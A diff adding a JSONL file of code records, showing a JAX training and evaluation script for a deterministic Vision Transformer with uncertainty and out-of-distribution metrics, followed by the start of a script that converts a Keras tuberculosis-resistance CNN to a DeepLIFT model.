diff --git "a/6645.jsonl" "b/6645.jsonl" new file mode 100644--- /dev/null +++ "b/6645.jsonl" @@ -0,0 +1,765 @@ +{"seq_id":"311461948","text":"# coding=utf-8\n# Copyright 2023 The Uncertainty Baselines Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Deterministic ViT.\"\"\"\nimport functools\nimport multiprocessing\nimport os\n\nfrom absl import app\nfrom absl import flags\nfrom absl import logging\nfrom clu import metric_writers\nfrom clu import parameter_overview\nfrom clu import periodic_actions\nfrom clu import preprocess_spec\nimport flax\nimport jax\nimport jax.numpy as jnp\nimport ml_collections.config_flags\nimport numpy as np\nimport robustness_metrics as rm\n\nimport tensorflow as tf\nimport uncertainty_baselines as ub\nimport checkpoint_utils # local file import from baselines.jft\nimport data_uncertainty_utils # local file import from baselines.jft\nimport input_utils # local file import from baselines.jft\nimport ood_utils # local file import from baselines.jft\nimport preprocess_utils # local file import from baselines.jft\nimport subpopl_utils # local file import from baselines.jft\nimport train_utils # local file import from baselines.jft\n\n# TODO(dusenberrymw): Open-source remaining imports.\nfewshot = None\n\nml_collections.config_flags.DEFINE_config_file(\n 'config', None, 'Training configuration.', lock_config=True)\nflags.DEFINE_string('output_dir', default=None, help='Work unit directory.')\nflags.DEFINE_integer(\n 'num_cores', default=None, help='Unused. How many devices being used.')\nflags.DEFINE_boolean(\n 'use_gpu', default=None, help='Unused. Whether or not running on GPU.')\nflags.DEFINE_string('tpu', None,\n 'Unused. Name of the TPU. Only used if use_gpu is False.')\n\nFLAGS = flags.FLAGS\n\n\ndef main(config, output_dir):\n\n seed = config.get('seed', 0)\n rng = jax.random.PRNGKey(seed)\n tf.random.set_seed(seed)\n\n if config.get('data_dir'):\n logging.info('data_dir=%s', config.data_dir)\n logging.info('Output dir: %s', output_dir)\n tf.io.gfile.makedirs(output_dir)\n\n save_checkpoint_path = None\n if config.get('checkpoint_steps'):\n save_checkpoint_path = os.path.join(output_dir, 'checkpoint.npz')\n\n # Create an asynchronous multi-metric writer.\n writer = metric_writers.create_default_writer(\n output_dir, just_logging=jax.process_index() > 0)\n\n # The pool is used to perform misc operations such as logging in async way.\n pool = multiprocessing.pool.ThreadPool()\n\n def write_note(note):\n if jax.process_index() == 0:\n logging.info('NOTE: %s', note)\n\n write_note('Initializing...')\n\n # Verify settings to make sure no checkpoints are accidentally missed.\n if config.get('keep_checkpoint_steps'):\n assert config.get('checkpoint_steps'), 'Specify `checkpoint_steps`.'\n assert config.keep_checkpoint_steps % config.checkpoint_steps == 0, (\n f'`keep_checkpoint_steps` ({config.checkpoint_steps}) should be'\n f'divisible by `checkpoint_steps ({config.checkpoint_steps}).`')\n\n batch_size = config.batch_size\n batch_size_eval = config.get('batch_size_eval', batch_size)\n if (batch_size % jax.device_count() != 0 or\n batch_size_eval % jax.device_count() != 0):\n raise ValueError(f'Batch sizes ({batch_size} and {batch_size_eval}) must '\n f'be divisible by device number ({jax.device_count()})')\n\n local_batch_size = batch_size // jax.process_count()\n local_batch_size_eval = batch_size_eval // jax.process_count()\n logging.info(\n 'Global batch size %d on %d hosts results in %d local batch size. '\n 'With %d devices per host (%d devices total), that\\'s a %d per-device '\n 'batch size.', batch_size, jax.process_count(), local_batch_size,\n jax.local_device_count(), jax.device_count(),\n local_batch_size // jax.local_device_count())\n\n write_note('Initializing train dataset...')\n rng, train_ds_rng = jax.random.split(rng)\n train_ds_rng = jax.random.fold_in(train_ds_rng, jax.process_index())\n train_ds = input_utils.get_data(\n dataset=config.dataset,\n split=config.train_split,\n rng=train_ds_rng,\n process_batch_size=local_batch_size,\n preprocess_fn=preprocess_spec.parse(\n spec=config.pp_train, available_ops=preprocess_utils.all_ops()),\n shuffle_buffer_size=config.shuffle_buffer_size,\n prefetch_size=config.get('prefetch_to_host', 2),\n data_dir=config.get('data_dir'))\n\n write_note('Initializing val dataset(s)...')\n\n def _get_val_split(dataset, split, pp_eval, data_dir=None):\n # We do ceil rounding such that we include the last incomplete batch.\n nval_img = input_utils.get_num_examples(\n dataset,\n split=split,\n process_batch_size=local_batch_size_eval,\n drop_remainder=False,\n data_dir=data_dir)\n val_steps = int(np.ceil(nval_img / batch_size_eval))\n logging.info('Running validation for %d steps for %s, %s', val_steps,\n dataset, split)\n\n if isinstance(pp_eval, str):\n pp_eval = preprocess_spec.parse(\n spec=pp_eval, available_ops=preprocess_utils.all_ops())\n\n val_ds = input_utils.get_data(\n dataset=dataset,\n split=split,\n rng=None,\n process_batch_size=local_batch_size_eval,\n preprocess_fn=pp_eval,\n cache=config.get('val_cache', 'batched'),\n num_epochs=1,\n repeat_after_batching=True,\n shuffle=False,\n prefetch_size=config.get('prefetch_to_host', 2),\n drop_remainder=False,\n data_dir=data_dir)\n\n return val_ds\n\n val_ds_splits = {\n 'val':\n _get_val_split(\n config.dataset,\n split=config.val_split,\n pp_eval=config.pp_eval,\n data_dir=config.get('data_dir'))\n }\n\n if config.get('test_split'):\n val_ds_splits.update({\n 'test':\n _get_val_split(\n config.dataset,\n split=config.test_split,\n pp_eval=config.pp_eval,\n data_dir=config.get('data_dir'))\n })\n\n if config.get('subpopl_cifar_data_file'):\n dataset_builder = input_utils.cifar_from_sql(\n sql_database=config.subpopl_cifar_data_file,\n num_classes=config.num_classes)\n\n subpopl_val_ds_splits = { # pylint: disable=g-complex-comprehension\n client_id: _get_val_split(\n dataset_builder,\n split=client_id,\n pp_eval=config.pp_eval_subpopl_cifar,\n data_dir=config.subpopl_cifar_data_file)\n for client_id in dataset_builder.client_ids\n }\n\n if config.get('eval_on_cifar_10h'):\n cifar10_to_cifar10h_fn = data_uncertainty_utils.create_cifar10_to_cifar10h_fn(\n config.get('data_dir', None))\n preprocess_fn = preprocess_spec.parse(\n spec=config.pp_eval_cifar_10h, available_ops=preprocess_utils.all_ops())\n pp_eval = lambda ex: preprocess_fn(cifar10_to_cifar10h_fn(ex))\n val_ds_splits['cifar_10h'] = _get_val_split(\n 'cifar10',\n split=config.get('cifar_10h_split') or 'test',\n pp_eval=pp_eval,\n data_dir=config.get('data_dir'))\n elif config.get('eval_on_imagenet_real'):\n imagenet_to_real_fn = data_uncertainty_utils.create_imagenet_to_real_fn()\n preprocess_fn = preprocess_spec.parse(\n spec=config.pp_eval_imagenet_real,\n available_ops=preprocess_utils.all_ops())\n pp_eval = lambda ex: preprocess_fn(imagenet_to_real_fn(ex)) # pytype: disable=wrong-arg-types\n val_ds_splits['imagenet_real'] = _get_val_split(\n 'imagenet2012_real',\n split=config.get('imagenet_real_split') or 'validation',\n pp_eval=pp_eval,\n data_dir=config.get('data_dir'))\n\n ood_ds = {}\n if config.get('ood_datasets') and config.get('ood_methods'):\n if config.get('ood_methods'): # config.ood_methods is not a empty list\n logging.info('loading OOD dataset = %s', config.get('ood_datasets'))\n ood_ds, ood_ds_names = ood_utils.load_ood_datasets(\n config.dataset,\n config.ood_datasets,\n config.ood_split,\n config.pp_eval,\n config.pp_eval_ood,\n config.ood_methods,\n config.train_split,\n config.get('data_dir'),\n _get_val_split,\n )\n\n ntrain_img = input_utils.get_num_examples(\n config.dataset,\n split=config.train_split,\n process_batch_size=local_batch_size,\n data_dir=config.get('data_dir'))\n steps_per_epoch = ntrain_img // batch_size\n\n if config.get('num_epochs'):\n total_steps = int(config.num_epochs * steps_per_epoch)\n assert not config.get('total_steps'), 'Set either num_epochs or total_steps'\n else:\n total_steps = config.total_steps\n\n logging.info('Total train data points: %d', ntrain_img)\n logging.info(\n 'Running for %d steps, that means %f epochs and %d steps per epoch',\n total_steps, total_steps * batch_size / ntrain_img, steps_per_epoch)\n\n write_note('Initializing model...')\n logging.info('config.model = %s', config.model)\n model = ub.models.vision_transformer(\n num_classes=config.num_classes, **config.model)\n\n # We want all parameters to be created in host RAM, not on any device, they'll\n # be sent there later as needed, otherwise we already encountered two\n # situations where we allocate them twice.\n @functools.partial(jax.jit, backend='cpu')\n def init(rng):\n image_size = tuple(train_ds.element_spec['image'].shape[2:])\n logging.info('image_size = %s', image_size)\n dummy_input = jnp.zeros((local_batch_size,) + image_size, jnp.float32)\n params = flax.core.unfreeze(model.init(rng, dummy_input,\n train=False))['params']\n\n # Set bias in the head to a low value, such that loss is small initially.\n params['head']['bias'] = jnp.full_like(params['head']['bias'],\n config.get('init_head_bias', 0))\n\n # init head kernel to all zeros for fine-tuning\n if config.get('model_init'):\n params['head']['kernel'] = jnp.full_like(params['head']['kernel'], 0)\n\n return params\n\n rng, rng_init = jax.random.split(rng)\n params_cpu = init(rng_init)\n\n if jax.process_index() == 0:\n num_params = sum(p.size for p in jax.tree_flatten(params_cpu)[0])\n parameter_overview.log_parameter_overview(params_cpu)\n writer.write_scalars(step=0, scalars={'num_params': num_params})\n\n @functools.partial(jax.pmap, axis_name='batch')\n def evaluation_fn(params, images, labels, mask):\n \"\"\"Copy to deterministic_utils.py whenever changes are made!\"\"\"\n # Ignore the entries with all zero labels for evaluation.\n mask *= (labels.max(axis=1) > 0).astype(labels.dtype)\n logits, out = model.apply({'params': flax.core.freeze(params)},\n images,\n train=False)\n label_indices = config.get('label_indices')\n logging.info('!!! mask %s, label_indices %s', mask, label_indices)\n if label_indices:\n logits = logits[:, label_indices]\n\n # Note that logits and labels are usually of the shape [batch,num_classes].\n # But for OOD data, when num_classes_ood > num_classes_ind, we need to\n # adjust labels to labels[:, :config.num_classes] to match the shape of\n # logits. That is just to avoid shape mismatch. The output losses does not\n # have any meaning for OOD data, because OOD not belong to any IND class.\n losses = getattr(train_utils, config.get('loss', 'sigmoid_xent'))(\n logits=logits,\n labels=labels[:, :(len(label_indices) if label_indices\n else config.num_classes)], reduction=False)\n loss = jax.lax.psum(losses * mask, axis_name='batch')\n\n top1_idx = jnp.argmax(logits, axis=1)\n # Extracts the label at the highest logit index for each image.\n top1_correct = jnp.take_along_axis(labels, top1_idx[:, None], axis=1)[:, 0]\n ncorrect = jax.lax.psum(top1_correct * mask, axis_name='batch')\n n = jax.lax.psum(mask, axis_name='batch')\n\n metric_args = jax.lax.all_gather([logits, labels, out['pre_logits'], mask],\n axis_name='batch')\n return ncorrect, loss, n, metric_args\n\n @functools.partial(jax.pmap, axis_name='batch')\n def cifar_10h_evaluation_fn(params, images, labels, mask):\n logits, out = model.apply({'params': flax.core.freeze(params)},\n images,\n train=False)\n label_indices = config.get('label_indices')\n if label_indices:\n logits = logits[:, label_indices]\n\n losses = getattr(train_utils, config.get('loss', 'softmax_xent'))(\n logits=logits, labels=labels, reduction=False)\n loss = jax.lax.psum(losses, axis_name='batch')\n\n top1_idx = jnp.argmax(logits, axis=1)\n # Extracts the label at the highest logit index for each image.\n one_hot_labels = jnp.eye(10)[jnp.argmax(labels, axis=1)]\n\n top1_correct = jnp.take_along_axis(\n one_hot_labels, top1_idx[:, None], axis=1)[:, 0]\n ncorrect = jax.lax.psum(top1_correct, axis_name='batch')\n n = jax.lax.psum(one_hot_labels, axis_name='batch')\n\n metric_args = jax.lax.all_gather([logits, labels, out['pre_logits'], mask],\n axis_name='batch')\n return ncorrect, loss, n, metric_args\n\n # Setup function for computing representation.\n @functools.partial(jax.pmap, axis_name='batch')\n def representation_fn(params, images, labels, mask):\n _, outputs = model.apply({'params': flax.core.freeze(params)},\n images,\n train=False)\n representation = outputs[config.fewshot.representation_layer]\n representation = jax.lax.all_gather(representation, 'batch')\n labels = jax.lax.all_gather(labels, 'batch')\n mask = jax.lax.all_gather(mask, 'batch')\n return representation, labels, mask\n\n # Load the optimizer from flax.\n opt_name = config.get('optim_name')\n write_note(f'Initializing {opt_name} optimizer...')\n opt_def = getattr(flax.optim, opt_name)(**config.get('optim', {}))\n\n # We jit this, such that the arrays that are created are created on the same\n # device as the input is, in this case the CPU. Else they'd be on device[0].\n opt_cpu = jax.jit(opt_def.create)(params_cpu)\n\n weight_decay_rules = config.get('weight_decay', []) or []\n rescale_value = 1.\n weight_decay_fn = train_utils.get_weight_decay_fn(\n weight_decay_rules=weight_decay_rules, rescale_value=rescale_value)\n\n @functools.partial(jax.pmap, axis_name='batch', donate_argnums=(0,))\n def update_fn(opt, lr, images, labels, rng):\n \"\"\"Update step. Copy to deterministic_utils.py whenever changes are made!\"\"\"\n measurements = {}\n\n # Split rng and return next_rng for the following step.\n rng, next_rng = jax.random.split(rng, 2)\n rng_local = jax.random.fold_in(rng, jax.lax.axis_index('batch'))\n\n def loss_fn(params, images, labels):\n logits, _ = model.apply(\n {'params': flax.core.freeze(params)}, images,\n train=True, rngs={'dropout': rng_local})\n label_indices = config.get('label_indices')\n if label_indices:\n logits = logits[:, label_indices]\n loss = getattr(train_utils, config.get('loss', 'sigmoid_xent'))(\n logits=logits, labels=labels)\n return loss, logits\n # Implementation considerations compared and summarized at\n # https://docs.google.com/document/d/1g3kMEvqu1DOawaflKNyUsIoQ4yIVEoyE5ZlIPkIl4Lc/edit?hl=en#\n (l, logits), g = train_utils.accumulate_gradient(\n jax.value_and_grad(loss_fn, has_aux=True), opt.target, images, labels,\n config.get('grad_accum_steps'))\n l, g = jax.lax.pmean((l, g), axis_name='batch')\n measurements['training_loss'] = l\n\n # Log the gradient norm only if we need to compute it anyways (clipping)\n # or if we don't use grad_accum_steps, as they interact badly.\n if config.get('grad_accum_steps', 1) == 1 or config.get('grad_clip_norm'):\n grads, _ = jax.tree_flatten(g)\n l2_g = jnp.sqrt(sum([jnp.vdot(p, p) for p in grads]))\n measurements['l2_grads'] = l2_g\n\n # Optionally resize the global gradient to a maximum norm. We found this\n # useful in some cases across optimizers, hence it's in the main loop.\n if config.get('grad_clip_norm'):\n g_factor = jnp.minimum(1.0, config.grad_clip_norm / l2_g)\n g = jax.tree_util.tree_map(lambda p: g_factor * p, g)\n opt = opt.apply_gradient(g, learning_rate=lr)\n\n opt = opt.replace(target=weight_decay_fn(opt.target, lr))\n\n params, _ = jax.tree_flatten(opt.target)\n measurements['l2_params'] = jnp.sqrt(sum([jnp.vdot(p, p) for p in params]))\n\n top1_idx = jnp.argmax(logits, axis=1)\n top1_correct = jnp.take_along_axis(labels, top1_idx[:, None], axis=1)[:, 0]\n prec1 = jax.lax.psum(jnp.sum(top1_correct), axis_name='batch') / batch_size\n measurements['training_prec@1'] = prec1\n measurements['learning_rate'] = lr\n return opt, next_rng, measurements\n\n reint_params = ('head/kernel', 'head/bias')\n if config.get('only_eval', False) or not config.get('reint_head', True):\n reint_params = []\n checkpoint_data = checkpoint_utils.maybe_load_checkpoint(\n train_loop_rngs=rng,\n save_checkpoint_path=save_checkpoint_path,\n init_optimizer=opt_cpu,\n init_params=params_cpu,\n init_fixed_model_states=None,\n default_reinit_params=reint_params,\n config=config)\n train_loop_rngs = checkpoint_data.train_loop_rngs\n opt_cpu = checkpoint_data.optimizer\n accumulated_train_time = checkpoint_data.accumulated_train_time\n\n write_note('Kicking off misc stuff...')\n first_step = int(opt_cpu.state.step) # Might be a DeviceArray type.\n logging.info('first_step = %s', first_step)\n if first_step == 0 and jax.process_index() == 0:\n writer.write_hparams(dict(config))\n\n chrono = train_utils.Chrono(\n first_step, total_steps, batch_size, accumulated_train_time)\n\n # Note: switch to ProfileAllHosts() if you need to profile all hosts.\n # (Xprof data become much larger and take longer to load for analysis)\n profiler = periodic_actions.Profile(\n # Create profile after every restart to analyze pre-emption related\n # problems and assure we get similar performance in every run.\n logdir=output_dir, first_profile=first_step + 10)\n\n # TODO(dusenberrymw): Remove manual replication by updating pmap axes.\n write_note(f'Replicating...\\n{chrono.note}')\n opt_repl = flax.jax_utils.replicate(opt_cpu)\n\n write_note(f'Initializing few-shotters...\\n{chrono.note}')\n fewshotter = None\n if 'fewshot' in config and fewshot is not None:\n fewshotter = fewshot.FewShotEvaluator(\n representation_fn, config.fewshot,\n config.fewshot.get('batch_size') or batch_size_eval)\n\n checkpoint_writer = None\n\n lr_fn = train_utils.create_learning_rate_schedule(total_steps,\n **config.get('lr', {}))\n\n # Prefetch all iterators, starting at the current first step.\n if first_step > 0:\n write_note('Advancing the dataset after resuming from a checkpoint...')\n # TODO(dusenberrymw): Look into checkpointing dataset state instead.\n train_ds = train_ds.skip(first_step)\n\n # TODO(dusenberrymw): According to flax docs, prefetching shouldn't be\n # necessary for TPUs.\n train_iter = input_utils.start_input_pipeline(\n train_ds, config.get('prefetch_to_device', 1))\n lr_iter = train_utils.prefetch_scalar(\n map(lr_fn, range(first_step, total_steps)),\n config.get('prefetch_to_device', 1))\n\n # Note: we return the train loss, val loss, and fewshot best l2s for use in\n # reproducibility unit tests.\n train_loss = -jnp.inf\n val_loss = {val_name: -jnp.inf for val_name, _ in val_ds_splits.items()}\n fewshot_results = {'dummy': {(0, 1): -jnp.inf}}\n\n write_note(f'First step compilations...\\n{chrono.note}')\n for step in range(first_step + 1, total_steps + 1):\n with jax.profiler.StepTraceAnnotation('train_step', step_num=step):\n train_batch = next(train_iter)\n lr_repl = next(lr_iter)\n if not config.get('only_eval', False):\n opt_repl, train_loop_rngs, extra_measurements = update_fn(\n opt_repl,\n lr_repl,\n train_batch['image'],\n train_batch['labels'],\n rng=train_loop_rngs)\n\n if jax.process_index() == 0:\n profiler(step)\n\n # Checkpoint saving.\n if not config.get('only_eval', False) and train_utils.itstime(\n step, config.get('checkpoint_steps'), total_steps, process=0):\n write_note('Checkpointing...')\n chrono.pause()\n train_utils.checkpointing_timeout(checkpoint_writer,\n config.get('checkpoint_timeout', 1))\n accumulated_train_time = chrono.accum_train_time\n # We need to transfer the weights over now or else we risk keeping them\n # alive while they'll be updated in a future step, creating hard to debug\n # memory errors (see b/160593526). Also, takes device 0's params only.\n opt_cpu = jax.tree_util.tree_map(lambda x: np.array(x[0]), opt_repl)\n\n # Check whether we want to keep a copy of the current checkpoint.\n copy_step = None\n if train_utils.itstime(step, config.get('keep_checkpoint_steps'),\n total_steps):\n write_note('Keeping a checkpoint copy...')\n copy_step = step\n\n # Checkpoint should be a nested dictionary or FLAX datataclasses from\n # `flax.struct`. Both can be present in a checkpoint.\n checkpoint_data = checkpoint_utils.CheckpointData(\n train_loop_rngs=train_loop_rngs,\n optimizer=opt_cpu,\n accumulated_train_time=accumulated_train_time)\n\n checkpoint_writer = pool.apply_async(\n checkpoint_utils.checkpoint_trained_model,\n (checkpoint_data, save_checkpoint_path, copy_step))\n chrono.resume()\n\n # Report training progress.\n if not config.get('only_eval', False) and train_utils.itstime(\n step, config.log_training_steps, total_steps, process=0):\n write_note('Reporting training progress...')\n timing_measurements, note = chrono.tick(step)\n write_note(note)\n train_measurements = {}\n train_measurements.update(flax.jax_utils.unreplicate(extra_measurements))\n train_measurements.update(timing_measurements)\n writer.write_scalars(step, train_measurements)\n # Keep train_loss to return for reproducibility tests.\n train_loss = train_measurements['training_loss']\n\n # Report validation performance.\n if config.get('only_eval', False) or train_utils.itstime(\n step, config.log_eval_steps, total_steps):\n write_note('Evaluating on the validation set...')\n chrono.pause()\n for val_name, val_ds in val_ds_splits.items():\n # Sets up evaluation metrics.\n ece_num_bins = config.get('ece_num_bins', 15)\n auc_num_bins = config.get('auc_num_bins', 1000)\n ece = rm.metrics.ExpectedCalibrationError(num_bins=ece_num_bins)\n calib_auc = rm.metrics.CalibrationAUC(correct_pred_as_pos_label=False)\n oc_auc_0_5 = rm.metrics.OracleCollaborativeAUC(oracle_fraction=0.005,\n num_bins=auc_num_bins)\n oc_auc_1 = rm.metrics.OracleCollaborativeAUC(oracle_fraction=0.01,\n num_bins=auc_num_bins)\n oc_auc_2 = rm.metrics.OracleCollaborativeAUC(oracle_fraction=0.02,\n num_bins=auc_num_bins)\n oc_auc_5 = rm.metrics.OracleCollaborativeAUC(oracle_fraction=0.05,\n num_bins=auc_num_bins)\n label_diversity = tf.keras.metrics.Mean()\n sample_diversity = tf.keras.metrics.Mean()\n ged = tf.keras.metrics.Mean()\n\n # Runs evaluation loop.\n val_iter = input_utils.start_input_pipeline(\n val_ds, config.get('prefetch_to_device', 1))\n ncorrect, loss, nseen = 0, 0, 0\n for batch in val_iter:\n if val_name == 'cifar_10h':\n batch_ncorrect, batch_losses, batch_n, batch_metric_args = (\n cifar_10h_evaluation_fn(opt_repl.target, batch['image'],\n batch['labels'], batch['mask']))\n else:\n batch_ncorrect, batch_losses, batch_n, batch_metric_args = (\n evaluation_fn(opt_repl.target, batch['image'],\n batch['labels'], batch['mask']))\n # All results are a replicated array shaped as follows:\n # (local_devices, per_device_batch_size, elem_shape...)\n # with each local device's entry being identical as they got psum'd.\n # So let's just take the first one to the host as numpy.\n ncorrect += np.sum(np.array(batch_ncorrect[0]))\n loss += np.sum(np.array(batch_losses[0]))\n nseen += np.sum(np.array(batch_n[0]))\n if config.get('loss', 'sigmoid_xent') != 'sigmoid_xent':\n # Here we parse batch_metric_args to compute uncertainty metrics.\n # (e.g., ECE or Calibration AUC).\n logits, labels, _, masks = batch_metric_args\n masks = np.array(masks[0], dtype=bool)\n logits = np.array(logits[0])\n probs = jax.nn.softmax(logits)\n # From one-hot to integer labels, as required by ECE.\n int_labels = np.argmax(np.array(labels[0]), axis=-1)\n int_preds = np.argmax(logits, axis=-1)\n confidence = np.max(probs, axis=-1)\n for p, c, l, d, m, label in zip(probs, confidence, int_labels,\n int_preds, masks, labels[0]):\n ece.add_batch(p[m, :], label=l[m])\n calib_auc.add_batch(d[m], label=l[m], confidence=c[m])\n # TODO(jereliu): Extend to support soft multi-class probabilities.\n oc_auc_0_5.add_batch(d[m], label=l[m], custom_binning_score=c[m])\n oc_auc_1.add_batch(d[m], label=l[m], custom_binning_score=c[m])\n oc_auc_2.add_batch(d[m], label=l[m], custom_binning_score=c[m])\n oc_auc_5.add_batch(d[m], label=l[m], custom_binning_score=c[m])\n\n if val_name == 'cifar_10h' or val_name == 'imagenet_real':\n num_classes = config.num_classes\n if config.get('label_indices'):\n num_classes = len(config.get('label_indices'))\n batch_label_diversity, batch_sample_diversity, batch_ged = data_uncertainty_utils.generalized_energy_distance(\n label[m], p[m, :], num_classes)\n label_diversity.update_state(batch_label_diversity)\n sample_diversity.update_state(batch_sample_diversity)\n ged.update_state(batch_ged)\n\n val_loss[val_name] = loss / nseen # Keep for reproducibility tests.\n val_measurements = {\n f'{val_name}_prec@1': ncorrect / nseen,\n f'{val_name}_loss': val_loss[val_name],\n }\n if config.get('loss', 'sigmoid_xent') != 'sigmoid_xent':\n val_measurements[f'{val_name}_ece'] = ece.result()['ece']\n val_measurements[f'{val_name}_calib_auc'] = calib_auc.result()[\n 'calibration_auc']\n val_measurements[f'{val_name}_oc_auc_0.5%'] = oc_auc_0_5.result()[\n 'collaborative_auc']\n val_measurements[f'{val_name}_oc_auc_1%'] = oc_auc_1.result()[\n 'collaborative_auc']\n val_measurements[f'{val_name}_oc_auc_2%'] = oc_auc_2.result()[\n 'collaborative_auc']\n val_measurements[f'{val_name}_oc_auc_5%'] = oc_auc_5.result()[\n 'collaborative_auc']\n writer.write_scalars(step, val_measurements)\n\n if val_name == 'cifar_10h' or val_name == 'imagenet_real':\n cifar_10h_measurements = {\n f'{val_name}_label_diversity': label_diversity.result(),\n f'{val_name}_sample_diversity': sample_diversity.result(),\n f'{val_name}_ged': ged.result(),\n }\n writer.write_scalars(step, cifar_10h_measurements)\n\n # OOD evaluation.\n # Entries in the ood_ds dict include:\n # (ind_dataset, ood_dataset1, ood_dataset2, ...).\n # OOD metrics are computed using ind_dataset paired with each of the\n # ood_dataset. When Mahalanobis distance method is applied, train_ind_ds\n # is also included in the ood_ds.\n if ood_ds and config.ood_methods:\n ood_measurements = ood_utils.eval_ood_metrics(\n ood_ds,\n ood_ds_names,\n config.ood_methods,\n evaluation_fn,\n opt_repl.target,\n n_prefetch=config.get('prefetch_to_device', 1))\n writer.write_scalars(step, ood_measurements)\n chrono.resume()\n\n # Perform subpopulation shift evaluation only if flag is provided.\n if config.get('subpopl_cifar_data_file'):\n subpopl_measurements = subpopl_utils.eval_subpopl_metrics(\n subpopl_val_ds_splits,\n evaluation_fn,\n opt_repl.target,\n n_prefetch=config.get('prefetch_to_device', 1))\n writer.write_scalars(step, scalars=subpopl_measurements)\n\n if 'fewshot' in config and fewshotter is not None:\n # Compute few-shot on-the-fly evaluation.\n if config.get('only_eval', False) or train_utils.itstime(\n step, config.fewshot.log_steps, total_steps):\n chrono.pause()\n write_note(f'Few-shot evaluation...\\n{chrono.note}')\n # Keep `results` to return for reproducibility tests.\n fewshot_results, best_l2 = fewshotter.run_all(opt_repl.target,\n config.fewshot.datasets)\n\n # TODO(dusenberrymw): Remove this once fewshot.py is updated.\n def make_writer_measure_fn(step):\n\n def writer_measure(name, value):\n writer.write_scalars(step, {name: value})\n\n return writer_measure\n\n fewshotter.walk_results(\n make_writer_measure_fn(step), fewshot_results, best_l2)\n chrono.resume()\n\n if config.get('only_eval', False):\n break\n elif config.get('testing_failure_step'):\n # Break early to simulate infra failures in test cases.\n if config.testing_failure_step == step:\n break\n\n write_note(f'Done!\\n{chrono.note}')\n pool.close()\n pool.join()\n writer.close()\n\n # Return final training loss, validation loss, and fewshot results for\n # reproducibility test cases.\n return train_loss, val_loss, fewshot_results\n\n\nif __name__ == '__main__':\n # Adds jax flags to the program.\n jax.config.config_with_absl()\n\n # TODO(dusenberrymw): Refactor `main` such that there is a `train_eval`\n # function that returns values for tests and does not directly access flags,\n # and then have `main` return None.\n\n def _main(argv):\n del argv\n config = FLAGS.config\n output_dir = FLAGS.output_dir\n main(config, output_dir)\n\n app.run(_main) # Ignore the returned values from `main`.\n","sub_path":"baselines/jft/deterministic.py","file_name":"deterministic.py","file_ext":"py","file_size_in_byte":31303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"183790414","text":"'''\nConverts our tensorflow/keras model to a deeplift model\nAuthors: Anna G. Green\n Chang Ho Yoon\n\nNote: This requires tensorflow v1!! The CNN model must be saved in tf1\n\nBased on Google Colab notebook DeepLIFT notebook genomics tutorial.ipynb\n'''\nfrom __future__ import print_function\nimport sparse\nimport os\nimport sys\nimport warnings\nimport h5py\nprint(\"h5py version:\", h5py.__version__)\nimport json\nimport deeplift\nwarnings.filterwarnings(\"ignore\")\n\nimport tensorflow as tf\nprint(\"Tensorflow version:\", tf.__version__)\nfrom tensorflow import keras\nprint(\"Keras version:\", keras.__version__)\nimport numpy as np\nprint(\"Numpy version:\", np.__version__)\nimport tensorflow.keras.backend as K\nimport pandas as pd\nimport deeplift.conversion.kerasapi_conversion as kc\n\nfrom sklearn.model_selection import KFold, StratifiedKFold\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras import models\nfrom sklearn.metrics import roc_auc_score, average_precision_score\n\nfrom tensorflow.keras.models import model_from_json\nfrom deeplift.layers import NonlinearMxtsMode\nfrom collections import OrderedDict\nfrom deeplift.util import compile_func\n\n####### Section 1: Read in the reference input data and convert to one-hot #########\n\ndef _get_shapes(df_geno):\n\t\t\"\"\"\n\t\tFinds the length of each gene in the input dataframe\n\t\tParameters\n\t\t----------\n\t\tdf_geno_pheno: pd.Dataframe\n\n\t\tReturns\n\t\t-------\n\t\tdict of str: int\n\t\t\tlength of coordinates in each column\n\t\t\"\"\"\n\t\tshapes = {}\n\t\tfor column in df_geno.columns:\n\t\t\tif \"one_hot\" in column:\n\t\t\t\tshapes[column] = df_geno.loc[df_geno.index[0],column].shape[0]\n\n\t\treturn shapes\n\nh37rv_geno = pd.read_pickle(\"../model_training/h37rv_geno.pkl\")\n\nshapes = _get_shapes(h37rv_geno)\nn_genes = len(shapes)\nL_longest = max(list(shapes.values()))\nprint(\"found n genes\", n_genes, \"and longest gene\", L_longest)\n\n# Initialize X to hold H37rv sequence in one hot encoding\nX = np.zeros((1, 4, L_longest, n_genes))\n\n# for each gene locus\nfor gene_index, gene in enumerate(shapes.keys()):\n one_hot_gene = h37rv_geno.loc[:, gene][0]\n # remove column of gaps/'missing' nucleotides as per DeepLift implementation\n one_hot_gene = one_hot_gene[:, :4]\n # rearrange axes to fit X\n one_hot_gene_arr = np.moveaxis(one_hot_gene, source = [0], destination = [1])\n X[:, :, range(0, one_hot_gene.shape[0]), gene_index] = one_hot_gene_arr\n\nX_h37rv = X\n\n####### Section 2: Prepare the model and save in json format ########\n# We must convert the keras model to a deeplift model\n# Deeplift model saved as a json file to be loaded in the future\n\ndef masked_multi_weighted_bce(alpha, y_pred):\n\n\t\"\"\"\n\tCalculates the masked weighted binary cross-entropy in multi-classification\n\n\tParameters\n\t----------\n\talpha: an element from the alpha matrix, a matrix of target y values weighted\n\t\tby proportion of strains with resistance data for any given drug\n\ty_pred: model-predicted y values\n\n\tReturns\n\t-------\n\tscalar value of the masked weighted BCE.\n\t\"\"\"\n\ty_pred = K.clip(y_pred, K.epsilon(), 1.0 - K.epsilon())\n\ty_true_ = K.cast(K.greater(alpha, 0.), K.floatx())\n\tmask = K.cast(K.not_equal(alpha, 0.), K.floatx())\n\tnum_not_missing = K.sum(mask, axis=-1)\n\talpha = K.abs(alpha)\n\tbce = - alpha * y_true_ * K.log(y_pred) - (1.0 - alpha) * (1.0 - y_true_) * K.log(1.0 - y_pred)\n\tmasked_bce = bce * mask\n\treturn K.sum(masked_bce, axis=-1) / num_not_missing\n\ndef masked_weighted_accuracy(alpha, y_pred):\n\n\t\"\"\"\n\tCalculates the mased weighted accuracy of a model's predictions\n\tParameters\n\t----------\n\talpha: an element from the alpha matrix, a matrix of target y values 